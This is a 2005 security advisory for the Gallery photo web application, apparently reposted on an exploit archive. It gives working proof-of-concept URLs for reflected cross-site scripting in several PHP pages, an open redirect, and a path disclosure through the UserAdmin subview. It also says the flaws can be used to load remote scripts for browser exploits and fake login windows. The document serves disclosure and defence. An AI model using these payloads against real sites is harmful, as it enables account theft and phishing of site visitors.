Gallery134.txt

Gallery134.txt: Posted Jan 18, 2005; Authored by Rafel Ivgi | Site theinsider.deep-ice.com; Gallery 1.3.4 suffers from remote script inclusion and cross site scripting vulnerabilities.; tags | exploit, remote, vulnerability, xss; SHA-256 | 36bc6482ca51b4b7350ffc8c1ee1e6a6bb416073b0a7a3a9c534cf7492035976; Download | Favorite | View

Gallery134.txt

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    Gallery
Vendors:        http://gallery.sourceforge.net
Versions:       v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
Platforms:      Windows
Bug:              Cross Site Scripting Vulnerability
Exploitation:   Remote With Browser
Date:             17 Jan 2005
Author:          Rafel Ivgi, The-Insider
E-Mail:          the_insider@mail.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Gallery is open to Cross Site Scripting vulnerability, allowing a remote
attacker to inject and execute scripts on the user’s machine while visiting
a remote gallery.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the
‘index’ field. The injection can be done using the classical tag closing:
"><script>alert()</script>

For Example:
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1">
<script>alert()</script>


Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’
in ALL the fields. The ‘slideshow_low.php’ contains the following form
fields:
set_albumName
slide_index
slide_full
slide_loop
slide_pause
slide_dir

The injection can be done using the classical tag closing:
"><script>alert()</script>

For Example:
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_
index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl
ide_dir=1

Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the
‘username’ field. The injection can be done using hex encoded tag closing
and an HTML event:
%22%20onactivate%3D"alert%28%29"

For Example:
http://<valid
host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"



Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the
‘username’ field.
The injection can be done using hex encoded tag closing and an HTML event:
%22%20onactivate%3D"alert%28%29"
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20
onactivate%3Dalert%28%29%3e
This version of Gallery also has an open redirection, which is a security
risk because
an attacker can send someone a link with a redirection to his evil host name
or to cause
the user to commit an attack or waste a target’s resources.

For Example:
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape
encoded evil
host name>&cmd= All the vulnerabilities described above can be used to
remotely call
a JavaScript file The injected JavaScript code is responsible for:
Automatic launching of malicious code (remote compromise by I.E exploits).
Identity theft using a spoofed re-login window (only for galleries with
login)

Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the
‘g2_form[subject]’
field. The injection can be done using an inline javascript protocol call:
javascript:alert()

For Example:
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
_form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert
()[/img]&g2_form[action][preview]=preview

Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
‘g2_subView’ parameter. It is possible the replace any valid subView value
such as: comment
:ShowComments with the admin value: core:UserAdmin. This causes the gallery
to wait 30 seconds
and then print out the Full Path of the gallery on the server.

For Example:
http://<valid host>/g2/main.php?g2_return= http://<valid
host>/main.php%3Fg2_view%3Dcore
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session
id such as:
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core
:UserAdmin

Then the following data will be printed out to the attacker:
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/UserAdmin.inc on line 55

Second Time
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/classes/GalleryUtilities.class on line 596

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Gallery v1.3.4-pl1
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al
ert()</script>
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s
cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"

Gallery v1.4.4-pl2
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*
/%20onactivate%3Dalert%28%29%3e<plaintext>
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww
.google.com&cmd=

Gallery v2.0 Alpha

1)  http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
 _form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview
]=preview

2)
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am
p;g2_view=core:UserAdmin&g2_subView=core:UserAdmin



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

Gallery134.txt

Gallery134.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Gallery134.txt

Share This

Gallery134.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems